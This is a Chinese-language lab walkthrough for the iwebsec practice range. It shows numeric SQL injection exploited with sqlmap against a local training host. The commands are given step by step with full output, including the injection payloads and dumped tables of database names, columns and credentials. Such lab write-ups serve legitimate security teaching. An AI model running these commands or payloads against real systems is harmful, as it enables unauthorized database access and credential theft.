iwebsec_wp
前言[*]在线靶场:点击此处即可到达靶场地址-->>>iwebsec
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230226101428864-496340055.png
2.本地搭建:使用官方所介绍的方法 点击跳转官网https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230226101555879-1868846920.png
iwebsec官网
(1)docker hub下载,命令 docker pull iwebsec/iwebsec
(2)VMware虚拟机环境下载地址链接:https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib 提取码: 0aib
iwebsec靶场配套书籍《Web安全原理分析与实践》
这里更加推荐使用本地环境。
sql注入漏洞
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
数字型注入
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230226102016211-133818465.png
打开靶场注入点已给出
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230226102045009-1602783370.png
/01.php?id=1
sqlmap
使用sqlmap判断是否存在漏洞
sqlmap -u http://192.168.70.157/sqli/01.php?id=1
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1
___
__H__
___ ___[(]_____ ___ ___{1.2.3#stable}
|_ -| . [,] | .'| . |
|___|_[(]_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:28:48
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:28:48爆数据库名
记录sqlmap的使用方法
命令如下
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
___
__H__
___ ___[(]_____ ___ ___{1.2.3#stable}
|_ -| . ["] | .'| . |
|___|_[)]_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:24:43
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetching database names
available databases :
[*] information_schema
[*] iwebsec
[*] test
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:24:43爆数据库列名
这里以iwebsec为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
___
__H__
___ ___[.]_____ ___ ___{1.2.3#stable}
|_ -| . [(] | .'| . |
|___|_[(]_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:31:12
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetching tables for database: 'iwebsec'
Database: iwebsec
+-------+
| user|
| sqli|
| users |
| xss |
+-------+
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:31:13爆字段
这里可以看到有user,sqli,users,xss的表,接下来就是直接爆字段这里以user表为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
___
__H__
___ ___[)]_____ ___ ___{1.2.3#stable}
|_ -| . [.] | .'| . |
|___|_[.]_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:33:41
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetching columns for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:33:42获取该字段中的信息
获取id账号密码信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
___
__H__
___ ___[)]_____ ___ ___{1.2.3#stable}
|_ -| . ["] | .'| . |
|___|_[,]_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:41:40
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetching entries of column(s) 'id, password, username' for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1| pass1 | user1 |
| 2| pass2 | user2 |
| 3| pass3 | user3 |
+----+----------+----------+
table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:41:40获取数据库所有用户信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
___
__H__
___ ___[(]_____ ___ ___{1.2.3#stable}
|_ -| . [,] | .'| . |
|___|_[.]_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:44:37
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetching database users
database management system users :
[*] 'iwebsec'@'localhost'
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:44:37直接枚举数据库信息
--current-db可以查看网站使用的当前数据库
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
点击查看代码root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
___
__H__
___ ___["]_____ ___ ___{1.2.3#stable}
|_ -| . [)] | .'| . |
|___|_[']_|_|_|__,|_|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:26:09
resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
fetching current database
current database: 'iwebsec'
missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
fetching current database
fetching tables for database: 'iwebsec'
fetching columns for table 'sqli' in database 'iwebsec'
fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
+----+-----------------------+------------------------------------------------------+----------+
| id | email | username | password |
+----+-----------------------+------------------------------------------------------+----------+
| 1| user1@iwebsec.com | user1 | pass1 |
| 2| user2@iwebsec.com | user2 | pass2 |
| 3| user3@iwebsec.com | user3 | pass3 |
| 4| user4@iwebsec.com | admin | admin |
| 5| 123@123.com | 123 | 123 |
| 6| 1234@123.com | ctfs' or updatexml(1,concat(0x7e,(version())),0)# | 123 |
| 7| iwebsec02@iwebsec.com | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# | 123456 |
+----+-----------------------+------------------------------------------------------+----------+
table 'iwebsec.sqli' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/sqli.csv'
fetching columns for table 'xss' in database 'iwebsec'
fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
+----+---------+
| id | name |
+----+---------+
| 1| iwebsec |
+----+---------+
table 'iwebsec.xss' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/xss.csv'
fetching columns for table 'user' in database 'iwebsec'
fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1| user1 | pass1 |
| 2| user2 | pass2 |
| 3| user3 | pass3 |
+----+----------+----------+
table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
fetching columns for table 'users' in database 'iwebsec'
fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
+-------+----------+-------------+
| role| username | password |
+-------+----------+-------------+
| admin | orange | mall123mall |
+-------+----------+-------------+
table 'iwebsec.users' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/users.csv'
fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:26:09
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]